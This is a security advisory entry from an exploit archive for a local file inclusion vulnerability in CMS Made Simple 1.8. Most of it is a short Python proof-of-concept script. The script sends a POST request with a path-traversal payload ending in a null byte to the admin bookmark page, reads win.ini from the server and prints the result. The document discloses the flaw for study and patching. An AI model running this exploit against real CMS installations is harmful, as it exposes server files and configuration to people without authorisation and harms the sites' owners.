CMS Made Simple 1.8 Local File Inclusion

2010-07-13T00:00:00
ID PACKETSTORM:91717
Type packetstorm
Reporter AutoSec Tools
Modified 2010-07-13T00:00:00

Description

                                        
                                            `# ------------------------------------------------------------------------   
# Software................CMS Made Simple 1.8   
# Vulnerability...........Local File Inclusion   
# Download................http://www.cmsmadesimple.org/   
# Release Date............7/11/2010   
# Tested On...............Windows Vista + XAMPP   
# ------------------------------------------------------------------------   
# Author..................John Leitch   
# Site....................http://cross-site-scripting.blogspot.com/   
# Email...................john.leitch5@gmail.com   
# ------------------------------------------------------------------------   
#   
# --Description--  
#   
# A local file inclusion vulnerability in CMS Made Simple 1.8 can be  
# exploited to include arbitrary files.  
#   
#   
# --PoC--  
import httplib, urllib  
  
host = 'localhost'  
path = '/cmsms'  
  
lfi = '../' * 32 + 'windows/win.ini\x00'  
  
c = httplib.HTTPConnection(host)  
c.request('POST', path + '/admin/addbookmark.php',  
urllib.urlencode({ 'default_cms_lang': lfi }),  
{ 'Content-type': 'application/x-www-form-urlencoded' })  
r = c.getresponse()  
  
print r.status, r.reason  
print r.read()  
`